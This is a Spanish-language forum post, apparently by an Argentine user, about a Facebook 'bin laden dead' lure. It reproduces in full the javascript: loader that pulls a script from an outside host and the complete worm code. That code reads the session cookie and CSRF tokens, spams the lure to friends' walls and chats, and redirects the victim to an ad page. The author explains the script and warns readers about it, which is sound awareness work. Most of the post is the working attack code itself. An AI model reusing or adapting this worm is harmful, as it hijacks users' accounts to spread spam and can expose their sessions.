En 10 minutos, tuvo seguro 30.000 seguidores la página!
Muy simple. Estaba en facebook cuando un amigo (uno solo por ahora) me "hablo" sobre una foto de bin laden muerto.
Más precisamente, algo así:
dijo:See a picture of bin laden dead! ?
No, mi amigo no habla inglés. Vive aca en Buenos Aires y es bien porteño.
Qué hice? Al toque hice click en el link. Llegue a una página de facebook, que llevaba a un marco externo y mostraba una capa con el estilo similar a una alerta de facebook. El contenido fijense, también en inglés.
Al aceptar esa "alerta", se selecciona el texto
dijo:javascript:(a=(b=document).createElement('script')).src='//themafiafamily.net/bin/bl.js',b.body.appendChild(a);void(0)
sintaxis idéntica al de espíaface. Este script, lleva al directorio: [quote]http://themafiafamily.net/bin/bl.js[/quote], y aca, sin ofuscación, sin un carajo, de hecho, con comentarios del autor, tienen el script.
Hice como nanopene (no porque él lo halla hecho, sino poruqe yo lo hacia de antes, ver como funcionan las páginas que visito a diario), y leíi el código javascript.
dijo:///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KuNG FU JS v.1 20yrsplus.info
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i ];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}
var user_id = readCookie("c_user" );
// Setup some variables
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
// Multiple URL Shorteners
var shortArray = new Array(
"http://www.facebook.com/picofbinladendead",
"http://www.facebook.com/picofbinladendead"
);
var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];
// Chat message variables
var this_chat = "See a picture of bin laden dead! "+shortUrl+"?";
var prepared_chat = encodeURIComponent(this_chat);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var token = Math.round(new Date().getTime() / 1000);
var http1 = new XMLHttpRequest();
var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";
var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.
if(http1.readyState == 4 && http1.status == 200) { // If state = success
var response1 = http1.responseText;
response1 = response1.replace("for (;
response1 = JSON.parse(response1); // Convert the response to JSON
//alert(response4.toSource());
var count = 0;
for(uid in response1.payload.entries){
if(count < 400){
//alert("SENT TO "+response1.payload.entries[count].uid);
// Loop to send messages
// New XMLHttp object
var httpwp = new XMLHttpRequest();
var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
var statusmessage="This will leave you speechless";
var title="See picture of bin laden dead!";
var link="http://www.facebook.com/picofbinladendead";
var description="First released picture of bin laden dead! ";
var picture="http://dl.dropbox.com/u/3730110/laden.png";
var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url ]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+"
httpwp.open("POST", urlwp, true);
//Send the proper header information along with the request
httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"
httpwp.setRequestHeader("Content-length", paramswp.length);
httpwp.setRequestHeader("Connection", "keep-alive"
httpwp.onreadystatechange = function() { //Call a function when the state changes.
if(httpwp.readyState == 4 && httpwp.status == 200){
//alert(http.responseText);
//alert('buddy list fetched');
}
}
httpwp.send(paramswp);
}
count++; // increment counter
}
http1.close; // Close the connection
}
}
http1.send(null);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var hide = document.getElementById('fbDockChatTabSlider');
hide.style.display = "none";
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http3 = new XMLHttpRequest();
var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);
//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded"
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close"
http3.onreadystatechange = function() {//Call a function when the state changes.
if(http3.readyState == 4 && http3.status == 200) {
var response3 = http3.responseText;
response3 = response3.replace("for (;
response3 = JSON.parse(response3);
var count = 0;
for(property in response3.payload.buddy_list.nowAvailableList){
if(count < 100){
// Loop to send messages
// New XMLHttp object
var httpc = new XMLHttpRequest();
// Generate random message ID
var msgid = Math.floor(Math.random()*1000000);
var time = Math.round(new Date().getTime() / 1000);
var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
httpc.open("POST", urlc, true);
//Send the proper header information along with the request
httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded"
httpc.setRequestHeader("Content-length", paramsc.length);
httpc.setRequestHeader("Connection", "close"
httpc.onreadystatechange = function() { //Call a function when the state changes.
if(httpc.readyState == 4 && httpc.status == 200){
//alert(http.responseText);
//alert('buddy list fetched');
}
}
httpc.send(paramsc);
}
//alert(property);
count++; // increment counter
}
http3.close; // Close the connection
}
}
http3.send(params3);
/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http4 = new XMLHttpRequest();
var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var params4 = "fbpage_id=112580802159800&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
http4.open("POST", url4, true);
//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded"
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close"
http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {
http4.close; // Close the connection
}
}
http4.send(params4);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http5 = new XMLHttpRequest();
var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var params5 = "fbpage_id=112580802159800&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
http5.open("POST", url5, true);
//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded"
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close"
http5.onreadystatechange = function() {//Call a function when the state changes.
if(http5.readyState == 4 && http5.status == 200) {
http5.close; // Close the connection
}
}
http5.send(params5);
*/
//document.getElementById('susta').style.display="none";
document.getElementById('contentArea').innerHTML="<center><br><br><br><br><br><br><br><br><img src="http://www.hindustantimes.com/images/loading_gif.gif" /><br />Please wait...</center>";
setTimeout("window.location = 'http://themafiafamily.net/bin/search.php';", 15000);
Este lo que hace es simplísimo, pega link en el muro de algunos amigos tuyos, envía por chat, y te hace fan de dos páginas (creo que ya no existen). Por último y como espíaface, te direcciona a , donde ahi tambien pasa lo mismo, tenes 3 anuncios y ...
LO ÚNICO!
tengan cuidado con la función readcookie(), por ahora lo unico que hace es sacar tu uid (identificador de usuario de facebook), pero quien sabe, que en un abrir y cerrar de ojos, la guarde en un archivo externo, con session y todo (quedense tranquilos igual, facebook debe comprobar cookie con ip).
EL TEMA DE MI RANGO DE USUARIO, NO SE MENCIONA EN LOS COMENTARIOS.